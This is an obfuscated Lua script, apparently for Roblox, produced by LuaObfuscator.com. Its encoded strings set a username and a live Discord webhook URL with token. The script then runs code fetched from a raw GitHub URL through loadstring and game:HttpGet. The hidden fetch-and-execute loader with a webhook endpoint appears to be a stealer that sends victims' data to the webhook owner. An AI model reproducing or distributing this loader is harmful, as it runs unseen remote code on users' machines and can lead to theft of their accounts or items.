--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v91=v5(v81,v19);v19=nil;return v91;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/(((1886 -(892 + 65)) -(214 + 713))^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + 1 + 0)) ;return v82-(v82%(1 -0)) ;else local v83=1065 -(68 + 997) ;local v84;while true do if (v83==(1270 -((538 -312) + 1044))) then v84=((1147 -526) -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (568 -(367 + 201)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=(0 -0) -0 ;local v36;local v37;while true do if (v35==1) then return (v37 * (606 -(87 + 263))) + v36 ;end if (v35==(180 -(67 + 113))) then v36,v37=v1(v16,v18,v18 + 2 + (952 -(802 + 150)) );v18=v18 + (4 -2) ;v35=1 + 0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;return (v41 * 16777216) + (v40 * (47703 + 17833)) + (v39 * (1253 -((2590 -1675) + 82))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,1 -0 ,1207 -(1069 + 118) ) * ((4 -2)^(69 -37))) + v42 ;local v46=v20(v43,4 + 17 ,54 -23 );local v47=((v20(v43,32)==(1 + 0)) and  -(792 -(368 + 423))) or (3 -2) ;if (v46==(18 -(10 + 8))) then if (v45==(0 -0)) then return v47 * (442 -(416 + 26)) ;else local v92=(1138 -(116 + 1022)) -0 ;while true do if (v92==(0 + 0)) then v46=1 -0 ;v44=438 -((603 -458) + 293) ;break;end end end elseif (v46==2047) then return ((v45==0) and (v47 * ((431 -(44 + 227 + 159))/(1486 -(998 + 488))))) or (v47 * NaN) ;end return v8(v47,v46-(325 + 698) ) * (v44 + (v45/(((7 -5) + 0)^((2925 -2101) -(201 + (1430 -(814 + 45))))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v65=1, #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==(0 + 0)) then local v88=0;while true do if (v88==(1 + 0)) then v51=1 -0 ;break;end if (v88~=0) then else v52=0 + 0 ;v53=nil;v88=242 -(187 + 54) ;end end end if (v51~=2) then else local v89=0;local v90;while true do if ((0 + 0)==v89) then v90=0 + 0 ;while true do if (v90==(781 -(162 + 618))) then v51=3;break;end if (v90~=0) then else v56=nil;v57=nil;v90=1;end end break;end end end if (v51~=(3 + 0)) then else v58=nil;while true do local v93=0;while true do if (v93==(0 + 0)) then local v98=0 -0 ;local v99;while true do if (v98~=(0 -0)) then else v99=0 + 0 ;while true do if (v99~=(1121 -(118 + 1003))) then else local v143=0;while true do if (v143==(1636 -(1373 + 263))) then if (v52~=(377 -(142 + 235))) then else local v153=0;local v154;local v155;while true do if (v153==(0 -0)) then v154=1000 -(451 + 549) ;v155=nil;v153=1 + 0 ;end if (v153==(978 -(553 + 424))) then while true do if (v154==0) then v155=0;while true do if (v155==(0 -0)) then v53={};v54={};v155=1 -0 ;end if (v155==(1 -0)) then v55={};v52=1385 -(746 + 638) ;break;end end break;end end break;end end end if (v52~=(2 + 1)) then else local v156=0 -0 ;local v157;while true do if (v156==(341 -(218 + 123))) then v157=0;while true do if (0~=v157) then else local v166=0 + 0 ;while true do if (v166==(1581 -(1535 + 46))) then for v172=1 + 0 ,v23() do v54[v172-1 ]=v28();end return v56;end end end end break;end end end v143=1 + 0 ;end if (v143~=1) then else v99=561 -(306 + 254) ;break;end end end if (v99==1) then v93=1 + 0 ;break;end end break;end end end if (v93~=(1 + 0)) then else if (v52~=1) then else local v113=0;while true do if (v113~=(1 -0)) then else v58={};v52=1469 -(899 + 568) ;break;end if (v113==0) then local v139=0 + 0 ;while true do if (v139==(0 -0)) then local v146=0;while true do if (v146~=0) then else v56={v53,v54,nil,v55};v57=v23();v146=291 -(60 + 230) ;end if (v146==1) then v139=1;break;end end end if (v139~=(1330 -(797 + 532))) then else v113=1 + 0 ;break;end end end end end if (v52==(1 + 1)) then local v114=0;local v115;while true do if ((0 -0)~=v114) then else v115=0;while true do if (v115==(573 -(426 + 146))) then for v148=1,v23() do local v149=0 + 0 ;local v150;local v151;local v152;while true do if (v149==1) then v152=nil;while true do if (v150==(1130 -(369 + 761))) then local v165=0 + 0 ;while true do if (v165~=(1 -0)) then else v150=1;break;end if (v165~=(1456 -(282 + 1174))) then else v151=811 -(569 + 242) ;v152=nil;v165=1 + 0 ;end end end if (v150==(2 -1)) then while true do if (v151==(0 -0)) then v152=v21();if (v20(v152,1,1)==0) then local v168=0 + 0 ;local v169;local v170;local v171;while true do if (v168==(217 -(42 + 174))) then local v177=0 + 0 ;local v178;while true do if (0~=v177) then else v178=0 + 0 ;while true do if ((0 + 0)~=v178) then else local v190=1504 -(363 + 1141) ;while true do if (v190==(1025 -(706 + 318))) then v178=1581 -(1183 + 397) ;break;end if (v190~=0) then else v171={v22(),v22(),nil,nil};if (v169==(1271 -(945 + 326))) then local v191=0 -0 ;local v192;while true do if (v191==(1975 -(1913 + 62))) then v192=0 + 0 ;while true do if (v192==(700 -(271 + 429))) then v171[3 + 0 ]=v22();v171[10 -6 ]=v22();break;end end break;end end elseif (v169==(1934 -(565 + 1368))) then v171[1503 -(1408 + 92) ]=v23();elseif (v169==(1088 -(461 + 625))) then v171[1291 -(993 + 295) ]=v23() -((1 + 1)^16) ;elseif (v169~=(1174 -(418 + 753))) then else local v197=0 -0 ;local v198;local v199;while true do if (v197~=(0 + 0)) then else v198=0 + 0 ;v199=nil;v197=1 -0 ;end if (v197~=(1 + 0)) then else while true do if (v198~=(0 + 0)) then else v199=0 + 0 ;while true do if ((529 -(406 + 123))~=v199) then else v171[1772 -(1749 + 20) ]=v23() -(2^16) ;v171[4]=v22();break;end end break;end end break;end end end v190=1 + 0 ;end end end if (v178==(1323 -(1249 + 73))) then v168=1 + 1 ;break;end end break;end end end if (2==v168) then local v179=1145 -(466 + 679) ;while true do if (v179==(1126 -(936 + 189))) then v168=6 -3 ;break;end if (v179==(0 -0)) then if (v20(v170,1901 -(106 + 1794) ,1 + 0 )==(1 + 0)) then v171[5 -3 ]=v58[v171[2]];end if (v20(v170,5 -3 ,2)~=(268 -(176 + 91))) then else v171[7 -4 ]=v58[v171[4 -1 ]];end v179=1;end end end if (v168==0) then local v180=114 -(4 + 110) ;local v181;while true do if (v180~=(584 -(57 + 527))) then else v181=0;while true do if (v181~=(1 + 0)) then else v168=3 -2 ;break;end if (v181~=(0 -0)) then else v169=v20(v152,1020 -(697 + 321) ,1430 -(41 + 1386) );v170=v20(v152,107 -(17 + 86) ,5 + 1 );v181=1 -0 ;end end break;end end end if ((6 -3)~=v168) then else if (v20(v170,3,3)~=1) then else v171[2 + 2 ]=v58[v171[11 -7 ]];end v53[v148]=v171;break;end end end break;end end break;end end break;end if (v149~=(166 -(122 + 44))) then else v150=0;v151=nil;v149=1 -0 ;end end end v52=5 -2 ;break;end if (v115==(0 -0)) then local v147=0;while true do if (v147==(0 + 0)) then for v159=1,v57 do local v160=611 -(602 + 9) ;local v161;local v162;local v163;local v164;while true do if (v160==(1191 -(449 + 740))) then while true do if (v161~=1) then else v164=nil;while true do if ((0 + 0)==v162) then local v174=872 -(826 + 46) ;local v175;while true do if (v174==(0 -0)) then v175=65 -(30 + 35) ;while true do if (v175==0) then local v185=0 + 0 ;while true do if ((1257 -(1043 + 214))==v185) then v163=v21();v164=nil;v185=3 -2 ;end if (v185~=1) then else v175=1 + 0 ;break;end end end if (1==v175) then v162=1;break;end end break;end end end if (v162==1) then if (v163==(1213 -(323 + 889))) then v164=v21()~=(0 -0) ;elseif (v163==(582 -(361 + 219))) then v164=v24();elseif (v163==3) then v164=v25();end v58[v159]=v164;break;end end break;end if (v161~=(320 -(53 + 267))) then else local v167=0 + 0 ;while true do if (v167~=0) then else v162=440 -(382 + 58) ;v163=nil;v167=414 -(15 + 398) ;end if ((983 -(18 + 964))==v167) then v161=3 -2 ;break;end end end end break;end if (v160==0) then v161=0 -0 ;v162=nil;v160=1 + 0 ;end if ((1 + 0)~=v160) then else v163=nil;v164=nil;v160=2;end end end v56[853 -(20 + 830) ]=v21();v147=1 + 0 ;end if (v147~=1) then else v115=1 -0 ;break;end end end end break;end end end break;end end end break;end if (v51==(2 -1)) then v54=nil;v55=nil;v51=128 -(116 + 10) ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=4) then if (v80<=1) then if (v80>0) then do return;end else v77[v79[2]]=v79[3];end elseif (v80<=2) then local v102=0;local v103;local v104;local v105;local v106;while true do if (0==v102) then v103=v79[2];v104,v105=v70(v77[v103](v13(v77,v103 + 1 ,v79[3])));v102=1;end if (2==v102) then for v140=v103,v72 do v106=v106 + 1 ;v77[v140]=v104[v106];end break;end if (v102==1) then v72=(v105 + v103) -1 ;v106=0;v102=2;end end elseif (v80==3) then local v116=0;local v117;while true do if (v116==0) then v117=v79[2];v77[v117]=v77[v117](v13(v77,v117 + 1 ,v72));break;end end else v77[v79[2]]();end elseif (v80<=6) then if (v80==5) then v77[v79[2]]=v79[3]~=0 ;else v77[v79[2]]=v61[v79[3]];end elseif (v80<=7) then local v110=0;local v111;local v112;while true do if (v110==1) then v77[v111 + 1 ]=v112;v77[v111]=v112[v79[4]];break;end if (v110==0) then v111=v79[2];v112=v77[v79[3]];v110=1;end end elseif (v80>8) then local v118;local v119;v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v119=v79[2];v118=v77[v79[3]];v77[v119 + 1 ]=v118;v77[v119]=v118[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];else v77[v79[2]][v79[3]]=v79[4];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365724E616D6503063O0020773773682003093O00557365724E616D653203083O00207737736834322003073O00576562682O6F6B037B3O0020682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130393531373831302O35333539333930372F514254382O6748534F5136645666495F49766E6759314E3745694D6C457668446157326944704D4E474F76382O5F617271664D74427251556F7759704133517A3156425020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C797068657253637269707473000F3O0012093O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0005000400014O0002000100044O00035O00022O00043O000100012O00013O00017O00",v9(),...);end
